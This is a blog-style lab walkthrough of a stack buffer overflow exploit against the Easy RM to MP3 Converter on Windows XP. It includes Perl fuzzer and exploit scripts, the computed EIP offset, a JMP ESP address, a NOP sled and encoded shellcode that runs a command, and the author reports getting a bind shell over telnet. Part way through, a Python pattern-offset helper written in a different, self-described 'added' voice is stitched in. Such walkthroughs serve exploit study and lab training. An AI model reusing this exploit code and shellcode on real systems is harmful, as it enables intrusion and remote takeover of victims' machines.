Wednesday, 10 April 2013

Buffer overflow : direct return exploit

A buffer overflow occurs when more data is written to a buffer than it can hold. The excess data is written to the adjacent memory, overwriting the contents of that location and causing unpredictable behaviour in the program. Buffer overflows happen when there is improper validation (no bounds checking) before the data is written. It is considered a bug or vulnerability in the software, and it can be used to exploit the software and gain access to the system.
There are two methods of exploiting a buffer overflow in the system's memory: the direct return exploit and the SEH based exploit.
A direct return exploit overflows the buffer and overwrites the EIP register, so the program crashes and can be exploited.
An SEH based exploit uses SEH (Structured Exception Handling), the mechanism that handles exceptions. When the program is overflowed with certain data, the SEH handler takes over, so the overwritten register location cannot be reached and the program cannot be exploited directly.

In this post I will write about the first method, the direct return exploit. The software used as a sample is “easy RM to MP3 Converter”, installed in my lab. The tools I use:
  1. backtrack 5
  2. metasploit framework
  3. lab (Windows XP SP 2 in VirtualBox)
  4. fuzzer data in perl
  5. easy RM to MP3 converter application
  6. OllyDbg application

Here are the steps:
1. run Windows XP in VirtualBox

2. install and run easy RM to MP3 converter, which will be used as the target.

3. send the fuzzer to find the vulnerability in the target. The fuzzer is a file containing a large number of characters that can cause the program to crash.

4. Create the fuzzer in Perl and run it to generate the file, which the target opens as an audio playlist. I named it song.m3u
my $file = "song.m3u";        # output file that the target will open
my $junk = "\x41" x 25000;    # 25000 'A' bytes
my $junk2 = "\x42" x 5000;    # 5000 'B' bytes
open($FILE, ">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";
5. load the fuzzer file into the target

6. if the target does not crash, increase the number of characters in the fuzzer program. If the target crashes, it means that the target is vulnerable and can be exploited.

7. open OllyDbg to find out what caused the target to crash


8. attach the target application to OllyDbg and run it

9. load the fuzzer file into the target again, and the target will crash


10. look at the EIP register in the top right of OllyDbg. EIP contains 42424242 and ESP contains BBBBBBB, bytes from the fuzzer file. It means that EIP has been overwritten by the fuzzer.


11. to find the byte position of EIP, edit the fuzzer file: replace the 5000 x B with a pattern created by Metasploit's pattern_create.rb
    ./pattern_create.rb 5000

12. copy the pattern into the fuzzer code, run it and load the file at the target again. Look at the EIP register content. The content is 366B4235.

To find the position of that value in the pattern, use pattern_offset.rb from Metasploit:
./pattern_offset.rb 366B4235


The offset is 1097. It means that EIP starts at byte 25000+1097 of the fuzzer file. Now edit the fuzzer again so that it looks like this:
my $file = "song.m3u";
my $junk = "\x41" x 26097;    # filler up to the EIP position (25000 + 1097)
my $eip = "BBBB";             # the 4 bytes that land in EIP
my $esp = "\x43" x 1000;      # 'C' bytes that follow, to see what ESP points at
open($FILE, ">$file");
print $FILE $junk.$eip.$esp;
close($FILE);
print "m3u File Created successfully\n";
Run it and load the file at the target from OllyDbg. Now EIP contains BBBB and ESP contains CCCCCCCCCC.

It means that the location of EIP is known, and now I will try to find the first location of ESP.
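To show what pattern_create.rb and pattern_offset.rb are doing in steps 11 and 12, here is an added Python re-implementation of the same idea (my own code, not the post's Perl and not Metasploit's Ruby; the function names are mine). It regenerates the cyclic pattern, turns the EIP value 366B4235 back into the 4 little-endian bytes that overwrote it, and recovers the 1097 offset and the 26097 file position used above.

```python
import string
import struct
from typing import Union

def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern Aa0Aa1...Aa9Ab0Ab1..., cut to `length` bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)  # more than one full period (20280 bytes) was requested

def pattern_offset(value: Union[int, bytes], length: int = 5000) -> int:
    """Locate the 4 pattern bytes that landed in EIP.

    `value` is either the register content as the debugger shows it (an int such as
    0x366B4235; x86 is little-endian, so it is packed with '<I' to get the bytes as
    they sit in memory) or the raw 4 bytes. Returns the offset inside the pattern,
    or -1 if absent. Raises if the bytes occur more than once, which would make the
    offset ambiguous (cannot happen inside one 20280-byte period of the pattern).
    """
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    pattern = pattern_create(length)
    hits = [i for i in range(len(pattern)) if pattern.startswith(needle, i)]
    if len(hits) > 1:
        raise ValueError("ambiguous: %r occurs %d times" % (needle, len(hits)))
    return hits[0] if hits else -1

def eip_offset_in_file(prefix_len: int, value: int, pattern_len: int = 5000) -> int:
    """Offset of EIP's 4 bytes from the start of the generated file, when the file is
    `prefix_len` filler bytes followed by the pattern (25000 'A's + 5000 in the post)."""
    off = pattern_offset(value, pattern_len)
    return -1 if off < 0 else prefix_len + off

if __name__ == "__main__":
    # Values from the post: EIP read 366B4235 after 25000 'A's + 5000 pattern bytes.
    print(pattern_offset(0x366B4235))             # 1097
    print(eip_offset_in_file(25000, 0x366B4235))  # 26097
```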


13. edit the fuzzer again with the following code:
my $file = "song.m3u";
my $junk = "\x41" x 26097;
my $eip = "BBBB";
# marker string so the bytes that ESP points at can be recognised in the debugger
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
    "5ABCDEFGHIJK6ABCDEFGHIJK" .
    "7ABCDEFGHIJK8ABCDEFGHIJK" .
    "9ABCDEFGHIJKAABCDEFGHIJK" .
    "BABCDEFGHIJKCABCDEFGHIJK";
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

14. run it and load the file at the target. Look at the ESP register. ESP contains bytes starting from DEFGHIJ..., not from 1ABCDE...

It means there is a 4 byte gap between EIP and ESP.

15. now edit the fuzzer again with the following code:
my $file = "song.m3u";
my $junk = "\x41" x 26097;
my $eip = "BBBB";
my $space = "XXXX";          # fills the 4 byte gap between EIP and ESP
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
    "5ABCDEFGHIJK6ABCDEFGHIJK" .
    "7ABCDEFGHIJK8ABCDEFGHIJK" .
    "9ABCDEFGHIJKAABCDEFGHIJK" .
    "BABCDEFGHIJKCABCDEFGHIJK";
open($FILE, ">$file");
print $FILE $junk.$eip.$space.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
16. run it and load the file at the target again. Now ESP starts from 1ABCDEF.... and the ESP starting address is 000FF73. This address will be used to point to the payload.


17. now edit the fuzzer again and build a shellcode with the following code:
my $file = "song.m3u";
my $junk = "\x41" x 26097;
my $eip = pack('V', 0x000ff730);      # ESP address, packed little-endian
my $shellcode = "\x90" x 25;          # NOP sled
$shellcode = $shellcode . "\xcc";     # INT3 breakpoint, so the debugger stops here
$shellcode = $shellcode . "\x90" x 25;
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

18. run the application and load the fuzzer. Now the EIP address is the same as the ESP address, which means EIP was loaded with the address of ESP.

19. the next step is to find an instruction called JMP ESP to put into the EIP register. When the program returns it goes to the address in EIP, EIP then jumps to ESP, and at ESP the payload is ready to be executed.

20. how to find JMP ESP? First open the application with OllyDbg. In the menu View > Executable modules, double click the shell32.dll module.
Right click in the command list and choose Search for > Command, then type JMP ESP.


Then I get the address of the JMP ESP instruction. The address is 7ca58265


21. now the information is complete and I am ready to put in the payload. Generate the payload using Metasploit msfweb (/pentest/exploits/framework2/msfweb). Open the web browser and go to 127.0.0.1:55555 to access msfweb. Choose the menu Payloads > Windows Execute Command. Fill in the form like the picture below and click Generate Payload. In this case I will call the calculator via the command line:



21. copy the payload code into the fuzzer file. Now the code looks like this:
my $file = "song.m3u";
my $junk = "\x41" x 26097;
my $eip = pack('V', 0x7ca58265);      # address of JMP ESP in shell32.dll, little-endian
my $shellcode = "\x90" x 25;          # NOP sled in front of the payload
$shellcode = $shellcode. "\x31\xc9\xda\xcf\xd9\x74\x24\xf4\xbb\x59\x1d\x52\xd1\xb1\x23\x5f". "\x83\xef\xfc\x31\x5f\x11\x03\x06\x0c\xb0\x24\x44\xc6\x70\xc7\xb4". "\x17\xf2\x82\x88\x9c\x78\x08\x88\xa3\x6f\x99\x27\xbc\xe4\xc1\x97". "\xbd\x11\xb4\x5c\x89\x6e\x46\x8c\xc3\xb0\xd0\xfc\xa0\xf1\x97\xfb". "\x69\x3b\x5a\x02\xa8\x57\x91\x3f\x78\x8c\x5e\x4a\x65\x47\x01\x90". "\x64\xb3\xd8\x53\x6a\x08\xae\x3c\x6f\x8f\x5b\x49\x93\x04\x9a\xa6". "\x25\x46\xb9\x3c\xf5\x46\x01\x58\x72\xe8\xb1\x25\x44\x91\xbd\xae". "\x05\x6e\x35\xc0\x99\xc3\xc2\x48\xaa\xf0\xdc\x03\x2a\xb6\xdf\x13". "\x2b\x3c\xb7\x2f\x74\x73\xbe\x2f\xdc\xfa\xc6\x2c\x20\x87\x66\x5a". "\xdf\xa0\x65\xe9\x77\xc9\x94\x87\x86\xbe\x97\x70\xf5\x21\x04\x1d".
"\xfa";
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

22. run the code and load the file into the target, without using OllyDbg.

23. and voila! The calculator appears right after the target opens the fuzzer file, and the system is successfully exploited.


24. I tried changing the payload to a bind shell, and here's the result:



25. and now the system is completely controlled via telnet!
